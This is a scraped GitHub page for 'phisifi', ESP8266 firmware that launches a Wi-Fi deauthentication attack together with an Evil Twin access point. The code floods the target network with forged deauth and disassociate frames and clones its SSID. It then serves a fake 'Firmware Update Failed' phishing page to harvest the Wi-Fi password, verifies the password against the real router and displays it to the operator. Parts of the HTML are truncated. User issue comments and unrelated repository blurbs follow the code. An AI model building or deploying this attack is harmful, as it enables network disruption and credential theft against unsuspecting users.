p3tr0s / phisifi Goto Github PK
View Code? Open in Web Editor NEWWiFi Hacking with an ESP8266 - Deauth combined with Evil Twin attack
WiFi Hacking with an ESP8266 - Deauth combined with Evil Twin attack
#include <Arduino.h>
#include <ESP8266WiFi.h>
#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <ESP8266HTTPClient.h>
extern "C" {
#include "user_interface.h"
}
typedef struct
{
String ssid;
uint8_t ch;
uint8_t bssid[6];
} _Network;
const byte DNS_PORT = 53;
IPAddress apIP(192, 168, 1, 1);
DNSServer dnsServer;
ESP8266WebServer webServer(80);
_Network _networks[16];
_Network _selectedNetwork;
void clearArray() {
for (int i = 0; i < 16; i++) {
_Network _network;
_networks[i] = _network;
}
}
String _correct = "";
String _tryPassword = "";
// Default main strings
#define SUBTITLE "ACCESS POINT RESCUE MODE"
#define TITLE "⚠ Firmware Update Failed"
#define BODY "Your router encountered a problem while automatically installing the latest firmware update.
To revert the old firmware and manually update later, please verify your password."
String header(String t) {
String a = String(_selectedNetwork.ssid);
String CSS = "article { background: #f2f2f2; padding: 1.3em; }"
"body { color: #333; font-family: Century Gothic, sans-serif; font-size: 18px; line-height: 24px; margin: 0; padding: 0; }"
"div { padding: 0.5em; }"
"h1 { margin: 0.5em 0 0 0; padding: 0.5em; font-size:7vw;}"
"input { width: 100%; padding: 9px 10px; margin: 8px 0; box-sizing: border-box; border-radius: 0; border: 1px solid #555555; border-radius: 10px; }"
"label { color: #333; display: block; font-style: italic; font-weight: bold; }"
"nav { background: #0066ff; color: #fff; display: block; font-size: 1.3em; padding: 1em; }"
"nav b { display: block; font-size: 1.5em; margin-bottom: 0.5em; } "
"textarea { width: 100%; }"
;
String h = ""
"<title>
String footer() {
return "
String index() {
return header(TITLE) + "
void setup() {
Serial.begin(115200);
WiFi.mode(WIFI_AP_STA);
wifi_promiscuous_enable(1);
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
webServer.on("/", handleIndex);
webServer.on("/result", handleResult);
webServer.on("/admin", handleAdmin);
webServer.onNotFound(handleIndex);
webServer.begin();
}
void performScan() {
int n = WiFi.scanNetworks();
clearArray();
if (n >= 0) {
for (int i = 0; i < n && i < 16; ++i) {
_Network network;
network.ssid = WiFi.SSID(i);
for (int j = 0; j < 6; j++) {
network.bssid[j] = WiFi.BSSID(i)[j];
}
network.ch = WiFi.channel(i);
_networks[i] = network;
}
}
}
bool hotspot_active = false;
bool deauthing_active = false;
void handleResult() {
String html = "";
if (WiFi.status() != WL_CONNECTED) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
webServer.send(200, "text/html", "<script> setTimeout(function(){window.location.href = '/';}, 4000); </script>
Please, try again.
");String _tempHTML = ""
"<style> .content {max-width: 500px;margin: auto;}table, th, td {border: 1px solid black;border-collapse: collapse;padding-left:10px;padding-right:10px;}</style>"
"
void handleIndex() {
if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}
if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}
if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP(_selectedNetwork.ssid.c_str());
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
} else if (webServer.arg("hotspot") == "stop") {
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;
}
if (hotspot_active == false) {
String _html = _tempHTML;
for (int i = 0; i < 16; ++i) {
if ( _networks[i].ssid == "") {
break;
}
_html += "<tr><td>" + _networks[i].ssid + "</td><td>" + bytesToStr(_networks[i].bssid, 6) + "</td><td>" + String(_networks[i].ch) + "<td><form method='post' action='/?ap=" + bytesToStr(_networks[i].bssid, 6) + "'>";
if (bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) {
_html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>";
} else {
_html += "<button>Select</button></form></td></tr>";
}
}
if (deauthing_active) {
_html.replace("{deauth_button}", "Stop deauthing");
_html.replace("{deauth}", "stop");
} else {
_html.replace("{deauth_button}", "Start deauthing");
_html.replace("{deauth}", "start");
}
if (hotspot_active) {
_html.replace("{hotspot_button}", "Stop EvilTwin");
_html.replace("{hotspot}", "stop");
} else {
_html.replace("{hotspot_button}", "Start EvilTwin");
_html.replace("{hotspot}", "start");
}
if (_selectedNetwork.ssid == "") {
_html.replace("{disabled}", " disabled");
} else {
_html.replace("{disabled}", "");
}
_html += "</table>";
if (_correct != "") {
_html += "</br><h3>" + _correct + "</h3>";
}
_html += "</div></body></html>";
webServer.send(200, "text/html", _html);
} else {
if (webServer.hasArg("password")) {
_tryPassword = webServer.arg("password");
if (webServer.arg("deauth") == "start") {
deauthing_active = false;
}
delay(1000);
WiFi.disconnect();
WiFi.begin(_selectedNetwork.ssid.c_str(), webServer.arg("password").c_str(), _selectedNetwork.ch, _selectedNetwork.bssid);
webServer.send(200, "text/html", "<!DOCTYPE html> <html><script> setTimeout(function(){window.location.href = '/result';}, 15000); </script></head><body><center><h2 style='font-size:7vw'>Verifying integrity, please wait...<br><progress value='10' max='100'>10%</progress></h2></center></body> </html>");
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
} else {
webServer.send(200, "text/html", index());
}
}
}
void handleAdmin() {
String _html = _tempHTML;
if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}
if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}
if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP(_selectedNetwork.ssid.c_str());
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
} else if (webServer.arg("hotspot") == "stop") {
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;
}
for (int i = 0; i < 16; ++i) {
if ( _networks[i].ssid == "") {
break;
}
_html += "
SSID | BSSID | Channel | Select |
---|---|---|---|
" + _networks[i].ssid + " | " + bytesToStr(_networks[i].bssid, 6) + " | " + String(_networks[i].ch) + " | ";
} if (deauthing_active) { if (hotspot_active) { if (_selectedNetwork.ssid == "") { if (_correct != "") { " + _correct + "";} _html += " |
}
String bytesToStr(const uint8_t* b, uint32_t size) {
String str;
const char ZERO = '0';
const char DOUBLEPOINT = ':';
for (uint32_t i = 0; i < size; i++) {
if (b[i] < 0x10) str += ZERO;
str += String(b[i], HEX);
if (i < size - 1) str += DOUBLEPOINT;
}
return str;
}
unsigned long now = 0;
unsigned long wifinow = 0;
unsigned long deauth_now = 0;
bool sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t wifi_channel) {
Serial.println(wifi_channel);
// Serial.println(bytesToStr(packet, 26));
wifi_set_channel(wifi_channel);
bool sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
if (sent) Serial.println("done");
return sent;
}
void loop() {
dnsServer.processNextRequest();
webServer.handleClient();
if (deauthing_active && millis() - deauth_now >= 200) {
uint8_t packet[26] = {
0xC0, 0x00,
0x00, 0x00,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00,
0x01, 0x00
};
bool success = false;
memcpy(&packet[10], _selectedNetwork.bssid, 6);
memcpy(&packet[16], _selectedNetwork.bssid, 6);
if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
success = true;
}
// send disassociate frame
packet[0] = 0xa0;
if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
success = true;
}
// uint8_t* apMac;
// uint8_t reason;
// uint8_t ch;
// apMac = _selectedNetwork.bssid;
// uint8_t stMac[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
// reason = 1;
// ch = _selectedNetwork.ch;
// deauthDevice(apMac, stMac, reason, ch);
// uint8_t deauthPacket[26] = {
// /* 0 - 1 */ 0xC0, 0x00, // type, subtype c0: deauth (a0: disassociate)
// /* 2 - 3 */ 0x00, 0x00, // duration (SDK takes care of that)
// /* 4 - 9 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // reciever (target)
// /* 10 - 15 */ 0xb6, 0x69, 0x21, 0x74, 0x02, 0xb6, // source (ap)
// /* 16 - 21 */ 0xb6, 0x69, 0x21, 0x74, 0x02, 0xb6, // BSSID (ap)
// /* 22 - 23 */ 0x00, 0x00, // fragment & squence number
// /* 24 - 25 */ 0x01, 0x00 // reason code (1 = unspecified reason)
// };
// packetSize = sizeof(deauthPacket);
// uint8_t deauthpkt[packetSize];
// uint8_t broadcast[] = {0x32, 0xAE, 0xA4, 0x07, 0x0D, 0x66};
// memcpy(deauthpkt, deauthPacket, packetSize);
// memcpy(&deauthpkt[4], broadcast, 6);
// // memcpy(&deauthpkt[10], _selectedNetwork.bssid, 6);
// // memcpy(&deauthpkt[16], _selectedNetwork.bssid, 6);
// deauthpkt[24] = 1;
// Serial.println(bytesToStr(deauthPacket, 26));
// deauthpkt[0] = 0xc0;
// wifi_set_channel(_selectedNetwork.ch);
// Serial.println(wifi_send_pkt_freedom(deauthpkt, sizeof(deauthPacket), 0));
// Serial.println(bytesToStr(deauthPacket, 26));
// uint8_t disassocpkt[packetSize];
// memcpy(disassocpkt, deauthpkt, packetSize);
// disassocpkt[0] = 0Xa0;
// Serial.println(wifi_send_pkt_freedom(disassocpkt, sizeof(deauthPacket), 0));
// deauth_now = millis();
// packetSize = sizeof(deauthPacket);
// uint8_t deauthpkt[sizeof(deauthPacket)];
// memcpy(deauthpkt, deauthPacket, packetSize);
// memcpy(&deauthPacket[4], broadcast, 6);
// memcpy(&deauthPacket[10], _selectedNetwork.bssid, 6);
// memcpy(&deauthPacket[16], _selectedNetwork.bssid, 6);
// uint8_t deauthPacket[24] = 1;
// // send deauth frame
// uint8_t deauthPacket[0] = 0xc0;
// wifi_set_channel(_selectedNetwork.ch);
// wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), _selectedNetwork.ch) == 0;
// // send disassociate frame
// // uint8_t disassocpkt[packetSize];
// // memcpy(disassocpkt, deauthPacket, packetSize);
// uint8_t disassocpkt[0] = 0xa0;
// wifi_set_channel(_selectedNetwork.ch);
// wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), _selectedNetwork.ch) == 0;
deauth_now = millis();
}
if (millis() - now >= 15000) {
performScan();
now = millis();
}
if (millis() - wifinow >= 2000) {
// if (WiFi.status() != WL_CONNECTED) {
// Serial.println("BAD");
// } else {
// Serial.println("GOOD");
// }
wifinow = millis();
}
}
Esp8266 not starting automatically after user entering correct password. And when I reconnect esp8266 to power . It's not showing password.. even the default AP' name is different like 'Fairy.......'
Bin file can be flashed with mobile. So please release the bin file.
How can I redo the "wifi" sign to make it more user-friendly?, seems like deauther doesn't work anymore!?...."I use google translate". Everything worked fine 🥹🥹
ap shows previous ap name tried full reset including nvm doesnt work
cant deauth.I think it is invalid.WI-PWN could work.so it doesn't matter with my board.
btw i use VScode to upload. and lib choose well
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.